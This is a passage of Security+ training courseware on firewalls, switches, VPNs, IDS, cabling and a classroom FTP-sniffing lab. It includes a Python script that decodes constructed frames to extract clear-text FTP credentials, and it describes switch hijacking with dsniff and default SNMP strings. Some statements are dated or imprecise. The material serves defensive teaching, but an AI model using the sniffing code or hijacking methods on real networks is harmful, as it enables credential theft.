Robust authentication and logging: Because all traffic can be made to pass through the application gateway, traffic can be authenticated before it reaches internal computers and can be logged.
Simpler filtering rules: The application gateway is the only computer that needs to be contacted by the filtering firewall or router; those systems need only allow application traffic destined for the gateway and discard the rest.
The chief disadvantage of application gateways is that a single computer host assigned as the gateway must handle all incoming connections, which, in a busy environment, could overwhelm the gateway. In addition, in the case of client-server protocols such as HTTP, two steps are required to connect inbound or outbound traffic, and this can increase processor overhead if there are many connections.
Exhibit 9-2: The OSI seven-layer model
The Physical layer (layer 1) deals with the electrical signals, the media access method (Ethernet, Token Ring, etc.), and the actual hardware of networking, including cables, connectors, hubs, and network cards.
The Data Link layer (layer 2) deals with the MAC address. This is the layer where bridges and older switches function.
The IP protocol works at the Network layer (layer 3), providing addressing and routing functions.
The Transport layer (layer 4) is responsible for host-to-host communications. Its two protocols are TCP and UDP.
The Session layer (layer 5) establishes, manages, and terminates connections.
The Presentation layer (layer 6) translates the application's data format to the network's communication format.
The Application layer (layer 7) defines how programs like FTP, HTTP, and Telnet exchange data.
A function at each layer need only be able to communicate with the layers above and below it and be able to communicate with its peer level. Changes at one level should not affect the ability of the other layers to function. For instance, if a Token Ring network is migrated to an Ethernet system, only the cabling, hardware, and drivers that represent the Physical and Data-Link layers need be modified, but the IP network should still function, as well as all protocols and applications above it.
Do it!
2 A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services is called a ________ ________.
bastion host
It is a network segment between two routers.
Its servers are publicly accessible.
Its servers have lower security requirements than other internal servers.
It commonly contains bastion, public Web, FTP, DNS, and RADIUS servers.
All of the above.
6 Application gateways simplify filtering rules on routers; the router need only allow application traffic destined for the gateway, and can discard the rest. True or false?
True
7 Which of the following tasks can be performed by the proxy server? (Choose all that apply.)
A Checks its access control list to accept or reject the client request
B Authenticates the user
C Opens a connection between the user and the internal computer
D Logs the connection
E All of the above
Packet filters can be cumbersome to define.
Processor overhead grows and throughput decreases with the complexity of the ACL.
Stateless routers cannot examine the content of a packet.
Topic C: Switches
This topic covers the following CompTIA Security+ exam objective:
#     Objective
3.1   Understand security concerns and concepts of the following types of devices: Switches
Exhibit 9-3: 3Com SuperStack switch
Just as they made moving information within an intranet more efficient, a new breed of switches is now operating at layer 3, the Network layer. It's now possible to combine the speed of hardware switching with the optimized path selection of layer 3.
Switch security
Modern switches offer a variety of security features including ACLs and Virtual Local Area Networks (VLANs). The ACL-based packet filtering is similar to that mentioned previously, so this discussion concentrates on VLANs. From a security perspective, the major benefit of a switch over a hub is the separation of collision domains, limiting the possibility of easy sniffing.
Virtual local area networks
The following is the Cisco definition of a virtual local area network (VLAN):
"A VLAN is defined as a broadcast domain within a switched network. Broadcast domains describe the extent that a network propagates a broadcast frame generated by a station. Some switches might be configured to support a single or multiple VLANs. Whenever a switch supports multiple VLANs, broadcasts within one VLAN never appear in another VLAN. Switch ports configured as a member of one VLAN belong to a different broadcast domain, as compared to switch ports configured as members of a different VLAN." (Overview of Routing Between Virtual LANs, Cisco Systems.)
VLANs increase security by clustering users in smaller groups, thereby making the job of the hacker harder. Rather than just gaining access to the network, a hacker must now gain access to a specific virtual LAN as well. In addition, by clustering users in a VLAN, the possibility of a broadcast storm is reduced.
Security problems with switches
Switches, even with VLANs enabled, are still susceptible to being compromised. Hackers can hijack a switch and reconfigure it to allow any traffic they wish through the system. Switch hijacking occurs when an unauthorized person is able to obtain administrator privileges on a switch and modify its configuration. Once a switch has been compromised, the hacker can do a variety of things, such as changing the administrator password on the switch, turning off ports to critical systems, reconfiguring VLANs to allow one or more systems to talk to systems they shouldn't, or configuring the switch to bypass the firewall altogether. There are two common ways to obtain unauthorized access to a switch: trying default passwords, which might not have been changed, and sniffing the network to get the administrator password via SNMP or Telnet. Almost all switches built today come with multiple accounts with default passwords, and in some cases, no password at all.
While most administrators know enough to change the administrator password for the Telnet and serial console accounts, sometimes people don't know to change the SNMP strings that provide remote access to the switch. If the default SNMP strings are not changed or disabled, hackers might be able to obtain a great deal of information about the network or even gain total control of the switch. The Internet is full of sites that list the various switch types, their administrator accounts, SNMP connection strings, and passwords. If the default password(s) do not work, the switch can still be compromised if a hacker is sniffing the network while an administrator is logging on to the switch. Contrary to popular belief, it's very possible to sniff the network on some switches. This means that even if you change the administrator password(s) and the SNMP strings, you might still be vulnerable to switch hijacking. The easiest way to sniff a switched network is to use a software tool called dsniff, which tricks the switch into sending packets destined for other systems to the sniffer. Dsniff not only captures packets on switched networks, but also has the functionality to automatically decode passwords from insecure protocols such as Telnet, HTTP, and SNMP, which are commonly used to manage switches.
Securing a switch
Because gaining access to a switch is the first step in gaining control of it, all management interfaces on switches should be isolated to reduce the chance of a successful attack. Many switches use Telnet or HTTP, both clear-text protocols, for management. It is recommended that any management of the switch be done by physical connection to a serial port or through secure shell (SSH) or another encrypted method, if available. Separate switches or hubs should be used for DMZs to physically isolate them from the rest of your network and prevent VLAN jumping. It's important to put a switch behind a dedicated firewall device. Ensure that you maintain the switch, installing the latest version of the switch software and any security patches to protect yourself against exploits such as the land.c attack. Read the product documentation, paying special attention to administration accounts and default passwords. Always set strong passwords on the switch.
Do it!
C-1:
Understanding switches
2 Modern switches can reduce broadcast traffic by forwarding packets based on the IP address. True or false?
True
3 A feature available in some switches that permits separating the switch into multiple broadcast domains is called ___________.
VLAN
Exhibit 9-4: An IP-based PBX network
A traditional PBX is a computer-based telephone switch that might be thought of as a small, in-house telephone company. Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. As with traditional networks, the process of securing a PBX should be part of a written security policy. Determining who will be administering your PBX, who will be allowed what services, and what access to the PBX will be allowed are all essential pieces of information.
Many PBX systems are remotely managed by the vendor who developed the system. If a PBX is remotely managed, that means intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware. It is recommended that, unless you are mandated to provide remote administration by the vendor, you remove this feature and administer the PBX from a console directly connected to the system. Additionally, many PBX systems are set up by default to allow handsets to be attached and detached at will by simply plugging a phone into the network and pressing a code on the keypad. This is done to ease maintenance, especially in those offices where hoteling or job sharing is common. Although this does ease the ability to move phones, it also opens a large security hole in the PBX system, because many of the move codes are standardized and posted on the Internet.
Modems
The increasing availability of digital cable and digital subscriber line (DSL) has brought some new security issues with it. Although this section is too limited to cover them in depth, the discussion touches upon several of the more pressing issues. A typical cable modem can be seen in Exhibit 9-5.
Exhibit 9-5: EtherFast cable modem with USB and Ethernet connection, model BEFCMU10
DSL versus cable modem security
In the past, DSL had a security edge over cable systems. This came about because of the different methods by which the technologies connected their clients to the Internet. DSL lines provide a direct connection between the computer or network connected on the client side and the Internet. This direct connection is in contrast to the party-line nature of cable systems. Cable modems are connected to a shared segment that, not unlike a corporate LAN, means that anyone else on that segment can potentially threaten your system unless proper precautions are taken. Although some cable customers encountered problems with the shared nature of the network in the past, most cable service providers now mitigate this problem by building security features into the cable modem hardware used to connect to their networks. In particular, basic network firewall capabilities now prevent customer files from being viewed or downloaded.
Most cable modems today also implement the Data Over Cable Service Interface Specification (DOCSIS). DOCSIS includes support for cable network security features including authentication and packet filtering.
Dynamic versus static IP addressing
Another major security concern that used to plague both DSL and cable modem users was the issuing of static (permanent) IP addresses by the service providers. Now, most service providers use Dynamic Host Configuration Protocol (DHCP) to issue dynamic, random IP addresses to their clients. These are leased for a short period. Static addresses provide a fixed target for potential hackers, so the move to DHCP is definitely an improvement. Additional security can be provided by a firewall solution.
Wireless
Wireless devices, while providing greater flexibility, mobility, and overall convenience, have their own vulnerabilities when it comes to security. While wireless network connections use the same TCP/IP protocol that wired LANs use, the wireless nature of the technology means that almost anyone can eavesdrop on a network communication; even if your wireless access point is protected by your firewall, you are still susceptible to having your unencrypted transmissions overheard. In addition, without proper access control, anyone can connect to the network. The only secure method of communicating with wireless technology is limiting access through MAC address filtering and providing confidentiality with encryption.
Mobile devices
Mobile devices, specifically Personal Digital Assistants (PDAs), can open security holes for any computer with which these devices communicate. A gap that is not covered by antivirus software or firewalls occurs during the PDA-to-PC synchronization process. View McAfee's Web site to get more information about wireless security at http://www.mcafee.com/myapps/vsw/default.asp. An example of a pocket
Do it!
D-1:
2 Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. True or false?
True
3 Explain the vulnerability involved in allowing the vendor to remotely manage the PBX system.
If a PBX is remotely managed, an intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware.
4 Explain why allowing handsets to be attached and detached at will within a PBX system is considered risky.
Many of the move codes are standardized and posted on the Internet.
Changing the MAC address of the computer on a random basis
Changing the IP address of the computer on a random basis
Tracking all keystrokes entered on the computer
Exhibit 9-7: A typical VPN using a Point of Presence (POP)
When a virtual private network is implemented, the lowest levels of the TCP/IP protocol are implemented using an existing TCP/IP connection. The VPN hardware or software encrypts either the underlying data in a packet or the entire packet itself before wrapping it in another IP packet for delivery. Even if the packet is intercepted along the way, the content cannot be revealed to the hacker. Security is further enhanced by implementing Internet Protocol Security (IPSec).
IPSec encryption
IPSec was initially developed for Internet Protocol version 6 (IPv6), but many current IPv4 devices support it as well. It is the most commonly used encryption scheme for VPN tunnels. IPSec allows the encryption of either just the data in a packet or the packet as a whole, including the address header information. These modes are called transport and tunnel, respectively. With IPSec in place, a VPN can virtually eliminate packet sniffing and identity spoofing. This is because only the sending and receiving computers hold the keys to encrypt and decrypt the packets being sent across the public network. The following steps show the process:
1 A remote user opens a VPN connection between his computer and his office network. The office network and the user's computer (or their respective VPN gateways) execute a handshake and establish a secure connection by exchanging private keys.
2 The user then makes a request for a particular file.
3 Assuming that the user has sufficient rights, the network begins to send the file to the user by first breaking the file into packets. If the VPN is using transport encryption, then the packet's data is encrypted and the packets are sent on their way. If the system is using tunneling encryption, then each packet is encrypted and placed inside another IP envelope with a new address arranged for by the VPN gateways.
4 The packets are sent along the Internet until they are received at the user's VPN device, where the encryption is removed and the file is rebuilt. If the VPN is using tunneling encryption, the peer VPN gateway forwards the unencrypted packets to the appropriate host on its LAN.
Anyone sniffing the packets would have no idea of their content and might not even be able to determine the source and destination of the request.
Do it!
E-1:
3 If the RAS is placed in the DMZ, remote users should be forced to authenticate through an internal firewall prior to gaining full network access. True or false?
True
4 Which encryption method is commonly used for VPN tunneling? (Choose all that apply.)
Host-based IDS
Explanation Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. IDS solutions are available from a variety of vendors including Computer Associates, Inc., Cisco Systems Inc., NFR Security, SecureWorks, and many others. Systems come in the form of software called computer-based IDS and dedicated hardware devices called network-based IDS. Host-based IDS are often used to secure critical network servers or other systems containing sensitive information. In a typical implementation, software applications known as agents are loaded on each protected computer. These agents make use of the disk space, RAM, and CPU time to analyze the operating system, applications, and system audit trails. The collected information is compared to a set of rules to determine if a security breach has occurred. These agents are tailored to detect computer-related activity and can track these types of events at an extremely fine level, even down to tracking which user accessed which file at what time. Host-based agents can be self-contained, sending alarm information to the screen attached to the computer upon which they are installed, or they might be remotely managed by a central software package that receives periodic updates and security data. A computer-based solution that includes a centralized management platform makes it easier to upgrade the software; however, these types of solutions do not scale well across a large enterprise, given the number of computers involved.
Network-based IDS
Network-based IDS monitor activity on a specific network segment. Unlike host-based agents, network-based systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. Implementations vary with some vendors selling separate sensor and management platforms and others selling self-contained sensor/management systems. An example of a Cisco IDS can be seen in Exhibit 9-8. The sensors in a network-based IDS capture network traffic in the monitored segment and perform rule-based or expert system analysis of the traffic using configured parameters. The sensors analyze packet headers to determine source and destination addresses in the same manner as a router. In addition, the sensors examine the type of data being transmitted and analyze the content of the packets flowing through them to determine if the packet is legitimate.
Network devices
If the sensor detects a packet that should not be in the system, it can perform a variety of tasks, including sending an alarm to the management software or communicating with a router to have the router block all further packets from a particular address. Automatic blocking should be enabled with care: an attacker who spoofs the source address of a legitimate host can use this feature to get that host blocked, turning the IDS into a denial-of-service tool.
Anomaly-based detection
Anomaly-based detection involves building statistical profiles of user activity and then reacting to any activity that falls outside these profiles. A user's profile can contain attributes such as time spent logged on to the network, location of network access, files and servers accessed, and so forth. One problem with anomaly-based detection is that users do not access their computers or the network in static, predictable ways; employees are transferred to other departments, or they go on the road or work from home, changing their point of entry into the network. Anomaly-based intrusion detection therefore often leads to a large number of false positives.
Discuss how anomaly detection systems are much like some of today's terrorist investigators, who have been monitoring a group or an area for quite some time and are looking for any changes in standard activity or behavior that might indicate something is amiss.
Signature-based detection
Signature-based detection is very similar to an antivirus program in its method of detecting potential attacks. It's currently the more popular method of detection. Vendors produce a list of signatures that the IDS compares against activity on the network or host. When a match is found, the IDS takes some action, such as logging the event or sending an alarm to a management console. Although many vendors allow users to configure existing signatures and create new ones, for the most part, customers depend on vendors to provide the latest signatures to keep the IDS up to date with the latest attacks; an attack for which no signature exists yet, or one altered enough to miss the signature, goes unnoticed. Signature-based detection can also produce false positives, as certain normal network activity can be construed as malicious. For example, some network applications or operating systems might send out numerous ICMP messages, which a signature-based detection system might interpret as an attempt by an attacker to map out a network segment.
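The two detection methods side by side, as an added example that is not part of the course material: a small Python script that runs two hard-coded signatures and a per-user anomaly profile over constructed connection records. The hosts, user names, thresholds, and the two signatures themselves are assumptions, chosen so that the false positives described above (a monitoring host that pings many servers, an employee working from home one evening) show up in the output.

```python
"""Added example, not from the course text: a toy signature-based and
anomaly-based detector run over constructed connection records.
Field names, hosts, users, thresholds and the signatures are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    src: str      # source host
    dst: str      # destination host
    proto: str    # "icmp" or "tcp"
    dport: int    # destination port (0 for icmp)
    user: str     # authenticated user, "" if none
    hour: int     # hour of day (0-23) the event was seen


# ---- Signature-based detection: fixed patterns "supplied by the vendor" ----
def sig_icmp_sweep(events, threshold=5):
    """One source sending ICMP echo to >= threshold distinct hosts.
    A monitoring server that pings every host matches this too, which is
    exactly the false positive the text mentions."""
    targets = defaultdict(set)
    for e in events:
        if e.proto == "icmp":
            targets[e.src].add(e.dst)
    return [f"icmp sweep from {src} ({len(t)} hosts)"
            for src, t in targets.items() if len(t) >= threshold]


def sig_cleartext_admin_ftp(events):
    """Administrator authenticating over FTP (port 21), i.e. in clear text."""
    return [f"cleartext Administrator FTP logon from {e.src}"
            for e in events
            if e.proto == "tcp" and e.dport == 21 and e.user == "Administrator"]


SIGNATURES = [sig_icmp_sweep, sig_cleartext_admin_ftp]


def run_signatures(events):
    alerts = []
    for sig in SIGNATURES:
        alerts.extend(sig(events))
    return alerts


# ---- Anomaly-based detection: per-user profile learned from a baseline ----
def build_profile(baseline):
    """Record, per user, the hosts they worked from and the hours seen."""
    profile = defaultdict(lambda: {"hosts": set(), "hours": set()})
    for e in baseline:
        if e.user:
            profile[e.user]["hosts"].add(e.src)
            profile[e.user]["hours"].add(e.hour)
    return dict(profile)


def run_anomaly(profile, events):
    alerts = []
    for e in events:
        if not e.user:
            continue
        if e.user not in profile:
            alerts.append(f"no baseline for user {e.user}")
            continue
        p = profile[e.user]
        if e.src not in p["hosts"]:
            alerts.append(f"{e.user} active from new host {e.src}")
        if e.hour not in p["hours"]:
            alerts.append(f"{e.user} active at unusual hour {e.hour}")
    return alerts


# ---- Constructed data -----------------------------------------------------
# Baseline week: jsmith works from 10.0.0.5 during office hours.
BASELINE = [Event("10.0.0.5", "10.0.0.100", "tcp", 445, "jsmith", h)
            for h in (9, 10, 11, 14, 16)]

# Later traffic: a monitoring host pings six servers, jsmith works from
# home one evening, and someone logs on to FTP as Administrator.
LIVE = (
    [Event("10.0.0.2", f"10.0.0.{n}", "icmp", 0, "", 3) for n in range(10, 16)]
    + [Event("10.0.0.5", "10.0.0.100", "tcp", 445, "jsmith", 10),
       Event("192.168.50.7", "10.0.0.100", "tcp", 445, "jsmith", 23),
       Event("10.0.0.9", "10.0.0.100", "tcp", 21, "Administrator", 13)]
)


def detect(baseline=BASELINE, live=LIVE):
    return {"signature": run_signatures(live),
            "anomaly": run_anomaly(build_profile(baseline), live)}


if __name__ == "__main__":
    for kind, alerts in detect().items():
        for a in alerts:
            print(f"[{kind}] {a}")
```

The signature side fires on the ICMP sweep (a benign monitoring host) and on the clear-text Administrator logon; the anomaly side says nothing about the sweep but flags jsmith's evening session from a new address, which is the "employee working from home" false positive, and the unknown Administrator account for which it has no profile at all.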
Do it! F-1: Discussing IDS
Do it! G-1:

Here's how / Here's why

Students should have a Windows Server 2003 installation CD-ROM available for this activity.

1 Boot to Server-X
2 Log on as Administrator
3 Click Start and choose Control Panel, Add or Remove Programs (To install Network Monitor.)
4 Click Add/Remove Windows Components
(Make sure students don't check the check box.)
Click Details
6 Check the Network Monitor Tools box and click OK
7 Click Next and insert the Windows Server 2003, Standard Edition CD (if prompted); click OK
8 Click Finish
9 Close the Add or Remove Programs window
10 Open a Command window and, at the command prompt, type ipconfig /all and press Enter
11 Write down the MAC address of the network card that is connected to the classroom network (You will use it to configure Network Monitor to operate on the appropriate NIC.)
13 Click OK
14 Expand Local Computer and select the appropriate NIC (the one with the MAC address you wrote down in step 11)

The screen will resemble the one shown below.
Do it! G-2: Using Network Monitor to sniff an FTP session

Here's how / Here's why

Pair up with a partner for this activity. Each of your servers should have the FTP server service and Network Monitor installed.

3 Expand Internet Information Services
4 Expand FTP Sites
5 Ensure that the Default FTP Site is started (Start the Default FTP Site if it's stopped.)
6 Click Start and choose Administrative Tools, Network Monitor
7 On the menu bar, choose Capture, Start
8 Open a Command window
9 Type ftp <your partner's IP address> (You might also use the IP address of your own server.)
10 Enter Administrator for the user name and password for the password
11 Once you are logged on, enter quit
12 Switch back to Network Monitor, choose Capture, Stop, and click View

Information displayed will be similar to that shown in Exhibit 9-9. Because FTP authenticates in clear text, the USER and PASS commands, password included, appear verbatim in the captured frames.
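What the capture in Exhibit 9-9 actually contains, as an added example that is not part of the course: a Python script that builds a constructed capture of the FTP logon above as raw Ethernet/IPv4/TCP frames, decodes the frames the way a sniffer does, and recovers the USER and PASS commands from the client-to-server stream. The MAC and IP addresses, the client port, and the password are invented; IP and TCP checksums are left at zero because nothing here validates them.

```python
"""Added example, not from the course: parse constructed Ethernet/IPv4/TCP
frames of an FTP logon and pull out the clear-text credentials.
Addresses, ports and the password are assumptions."""
import struct
from collections import defaultdict


def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def _ip(s):
    return bytes(int(o) for o in s.split("."))


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, payload):
    """Constructed Ethernet II + IPv4 (no options) + TCP (no options) frame.
    Checksums are zero; nothing here validates them."""
    eth = _mac(dst_mac) + _mac(src_mac) + b"\x08\x00"          # EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0,
                     64, 6, 0, _ip(src_ip), _ip(dst_ip))        # proto 6 = TCP
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18,
                      8192, 0, 0)                               # PSH|ACK
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Decode a frame the way a sniffer does; return
    (src_ip, dst_ip, sport, dport, payload) or None if not TCP over IPv4."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4                 # IP header length
    total_len = struct.unpack("!H", frame[16:18])[0]
    if frame[23] != 6:                           # IP protocol field
        return None
    src_ip = ".".join(str(b) for b in frame[26:30])
    dst_ip = ".".join(str(b) for b in frame[30:34])
    tcp = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[tcp:tcp + 4])
    data_off = (frame[tcp + 12] >> 4) * 4        # TCP header length
    payload = frame[tcp + data_off:14 + total_len]
    return src_ip, dst_ip, sport, dport, payload


def extract_ftp_logins(frames):
    """Reassemble client->server control-channel bytes per flow and pull
    out the USER and PASS commands, which FTP sends unencrypted."""
    streams = defaultdict(bytes)
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src_ip, dst_ip, sport, dport, payload = parsed
        if dport == 21:
            streams[(src_ip, sport, dst_ip)] += payload
    logins = []
    for (src_ip, sport, dst_ip), data in streams.items():
        creds = {}
        for line in data.decode("ascii", "replace").split("\r\n"):
            verb, _, arg = line.partition(" ")
            if verb.upper() in ("USER", "PASS"):
                creds[verb.upper()] = arg
        if "USER" in creds:
            logins.append((src_ip, dst_ip, creds["USER"], creds.get("PASS", "")))
    return logins


# Constructed capture of the activity's exchange (all values invented).
CLIENT = ("00:0c:29:aa:bb:01", "10.0.0.11")
SERVER = ("00:0c:29:aa:bb:02", "10.0.0.12")


def constructed_capture():
    c_mac, c_ip = CLIENT
    s_mac, s_ip = SERVER

    def c2s(p):
        return build_frame(c_mac, s_mac, c_ip, s_ip, 1045, 21, p)

    def s2c(p):
        return build_frame(s_mac, c_mac, s_ip, c_ip, 21, 1045, p)

    return [
        s2c(b"220 Microsoft FTP Service\r\n"),
        c2s(b"USER Administrator\r\n"),
        s2c(b"331 Password required for Administrator.\r\n"),
        c2s(b"PASS password\r\n"),
        s2c(b"230 User Administrator logged in.\r\n"),
        c2s(b"QUIT\r\n"),
        s2c(b"221\r\n"),
    ]


if __name__ == "__main__":
    for src, dst, user, pw in extract_ftp_logins(constructed_capture()):
        print(f"{src} -> {dst}: USER {user} PASS {pw}")
```

The point is that no decryption step exists anywhere in this code: the credentials are simply bytes in the TCP payload, and any host that can see the frames (a hub port, a mirror port, a compromised switch) gets them for free.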
Do it! G-3:

2 Which of the following security features is available for the full version of Network Monitor?
A Identify Network Monitor Users
B Intrusion detection system add-on
C Packet modification tools
D Password Sniffing tools

3 Network Monitor will allow you to view encrypted data in plain text. True or false?
False. A sniffer captures the encrypted bytes exactly as they crossed the wire; without the key they are unreadable.

4 Which of the following protocols sends passwords and data in clear text? (Choose all that apply.)
A Telnet
B FTP
C HTTP
D NNTP
E IMAP
F POP
G SNMP
H All of the above
(In their basic form all of these send credentials and data in clear text; the protected replacements, such as SSH in place of Telnet, FTPS or SFTP, HTTPS, IMAPS, POP3S, and SNMPv3 with authentication and privacy, are what should be deployed.)

5 Network Monitor will capture all data sent to your NIC by default. What can be used to narrow the scope of the data collected?
A
B
C

6 Network Monitor is considered a sniffer. Which of the following is a characteristic of a sniffer?
A
B
C
D
7 A sniffer can be dangerous because it is very difficult to detect and can be attached to almost any part of a network. True or false?
True
Review questions
1 What is a firewall?
A hardware or software barrier that isolates one network from another.
2 What do you gain by answering the following questions: What is being protected? From whom is it being protected? What services does the company need to access over the network? Who gets access to which resources? Who administers the network?
By answering those questions you can draft a robust security policy.
6 What is a router?
A network management device that sits between different network segments and routes traffic from one network to another.
Repeater Hub
12 Which Layer 2 device can limit the functionality of sniffing?
A A bridge
B A hub
C A switch
D A router

13 Why should you configure a switch using a physical connection to it?
If you use Telnet or HTTP to access the switch remotely, both are clear-text protocols that can be intercepted, compromising the switch configuration and the credentials used to manage it. Use the console port, or SSH/HTTPS where the switch supports them.
14 What feature is used for cable network security that provides authentication and packet filtering?
DOCSIS
CompTIA Security+ Certification 15 What steps can you take to make RAS connections more secure?
Use a bastion host running only RAS and protected by application gateway software or firewall software. To further enhance security, use the encryption and mandatory callback features offered by RAS. In addition, if any unauthorized person should gain access to the RAS server, they will still have to break through the firewall to get useful information.
17 Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. True or False?
True
18 Host-based IDS are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. True or False?
False: This is a description of a network-based IDS.
2 Click on the ShieldsUp! link. You might have to scroll down to see the link.
3 On the resulting Shields Up! page, scroll down midway and click on the Proceed button. Click Yes.
4 Click on the File Sharing button.
5 Your computer system will be tested for file system security. If you have a printer available, print the results of the test, noting any system vulnerabilities.
6 Scroll down the page and click on the Common Ports button.
7 Your computer system will be tested for security related to ports that are commonly used. If you have a printer available, print the results of the test, noting any system vulnerabilities.
8 Repeat the process by clicking on the All Service Ports, Messenger Spam, and Browser Headers buttons, one after the other, after each previous test has completed.
9 When you've completed all tests, return to the GRC Web site at http://grc.com/default.htm and again click on the ShieldsUp! link.
10 Close all open windows.

Note that an external scanner like this tests whatever answers on your public address, so behind a NAT router or firewall the results describe that device, not necessarily the workstation you are sitting at.
Coaxial cable
Coaxial cable has a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield (see Exhibit 10-1). Coaxial cable tends to be more expensive than traditional telephone wiring, but is much less prone to interference. Vulnerabilities include cable breaks and malicious tapping. There are three types of coaxial cable used in networking:
RG-8
RG-58
RG-59
RG-8

RG-8, also referred to as 10Base5 or ThickNet, is the oldest form of coaxial cable. It uses baseband (single channel) signaling and 50-Ohm terminators. It is primarily used as a backbone in an Ethernet LAN environment and often connects one wiring closet to another. It can transmit data at speeds up to 10 Mbps, cover distances up to 500 meters, and accommodate up to 100 nodes per segment. Up to five segments can be daisy-chained. Due to its rigidity, it is difficult to work with.

RG-58

RG-58, also called 10Base2 or Thinnet (thin coaxial cable), uses baseband signaling and 50-Ohm terminators. It is the more popular form of coaxial cabling for Ethernet networks. Thinnet is capable of covering up to 185 meters and is not highly susceptible to noise interference. It transmits at 10 Mbps and can support up to 30 nodes per segment. Up to five segments can be daisy-chained.

RG-59

RG-59 is the familiar coax cable used for cable TV and cable modems. It is rated 75 Ohms and offers broadband (multiple channels) transmission. RG-59 is able to transport both analog and high-speed digital signals, allowing for data, voice, and video capabilities.

Note: It is important to know that 50-ohm and 75-ohm cabling are not interchangeable.
The difference between UTP and shielded twisted pair (STP) is an extra foil shield wrapped around the copper pairs to provide additional protection from EMI (Exhibit 10-3).
Exhibit 10-3: Shielded twisted pair cable

Twisted pair is further classified into categories based on the data transmission rates it can sustain. The most common types are Category 3 (CAT 3), Category 5 (CAT 5), and, most recently, Category 6 (CAT 6). CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems. CAT 5 is required to support Fast Ethernet (100 Mbps) and uses an 8-pin configuration that can be wired as a crossover cable, a straight-through cable, or a customized cable. CAT 5E is a higher grade of CAT 5 cable and is also sufficient for Gigabit Ethernet over copper (1000BASE-T). CAT 6 is a newer technology that supports Gigabit Ethernet (1000 Mbps), is backward compatible, and also uses an 8-pin configuration. Twisted pair connects to hardware using an RJ-45 connector, which looks very similar to a phone jack but is a bit larger (Exhibit 10-4).
Exhibit 10-4: RJ-45 connector

Note: It is important to know that twisted pair is very easily spliced, which allows unauthorized users access to the network. A discussion of these types of problems follows later in the unit.
Fiber-optic cable
Fiber-optic cable is the newest form of cable available. It comprises a glass core that is encased by a plastic outer covering. It is also much smaller, lighter, more fragile, and susceptible to damage than coaxial cable or twisted pair (Exhibit 10-5).
Exhibit 10-5: Fiber-optic cable

Instead of an electrical current (like coaxial and twisted pair), fiber-optic cable carries light. It is capable of transmitting more data much further than other wiring types and is immune to the effects of EMI. Perhaps the biggest benefit of using fiber-optic cable is that it is very hard to splice without detection. In order to split a fiber-optic signal, the core must be disrupted, which makes detection by a network administrator easier. (Optical taps that bend the fiber to leak a little light do exist, so in practice this protection depends on monitoring received optical power and investigating unexplained loss.) The biggest disadvantages of fiber are its cost and its difficulty to install and manipulate. The table below provides a comparison of the three types of wired transmission media just discussed.
Media              Advantages                                     Disadvantages
Coaxial cable      High bandwidth, long distances,                Physical dimensions (can be bulky and
                   relative EMI immunity                          difficult to work with), easily tapped,
                                                                  single cable break brings the network down
Twisted pair       Inexpensive, widely used, easy to add          Most sensitive to EMI, supports short
                   nodes, single cable break won't bring          distances, easily tapped
                   the network down
Fiber-optic cable  Very high bandwidth, EMI immunity,             Cost, difficult to install and manipulate,
                   long distances                                 fragile
Wireless
Unguided transmissions of data use various technologies, including microwave, radio, and infrared, to transmit and receive over the airwaves. Wireless was previously discussed at length, yet it is important to realize that it too is a form of transmission media and should be considered when implementing and securing networks. Much like coaxial cable and twisted pair copper cable, unguided transmission methods are vulnerable to security breaches in which unauthorized users intercept data flows. The most important distinction is that because unguided transmissions cannot be physically contained the way guided media can, they are much more difficult to secure.
Do it! A-1:

2 A(n) __________ is a standardized connector used to connect twisted pair copper cable to a piece of networking equipment.
A
B
C
D
E
7 Twisted-pair cable is the most widely known by the general public because it is the primary type of cabling used for cable television. True or false?
False. Coaxial cable is used for cable television.
8 CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems. True or false?
True
It is extremely difficult to ensure the security of physical cabling. Both coaxial cable and twisted pair are easily spliced. The most vulnerable places for gaining unauthorized access to cabling are between buildings or floors. Sometimes, the distance between the points is large enough to require fiber-optic cable, which gives the added benefit of more security. However, the majority of interfloor connections still use some form of copper wire, which makes the physical security of that connection all the more important.

Electromagnetic emissions

Despite all of the physical security that can be implemented, it is still possible for attackers to eavesdrop on data flows by listening for electromagnetic emissions from workstations and other nodes. There are several ways to protect against this. If possible, purchase and use equipment that is designed to limit or eliminate the signal leaks; this can be very expensive. Fiber-optic cable is especially good at eliminating this type of risk, since it carries light rather than current. Another way to stop eavesdropping through electromagnetic emission is to encrypt the data flows using any of various encryption technologies. This way, even if an attacker has access to the flows, the data is useless without the key to decrypt it.

Power interruptions

In many situations, LAN and wiring closets tend to share spaces with power sources and other utilities. This exposes the network to a failure risk even without the threat of an attacker. Should there be a fire, the network can be showered with water or other fire retardants. Several dry methods for fire extinguishing can be used and should be investigated when securing a network. Many LANs are also completely reliant on a power supplier for all the power to the network. Deploying an uninterruptible power supply (UPS) can mitigate this risk by providing temporary power during a brief outage.
Interruption of services

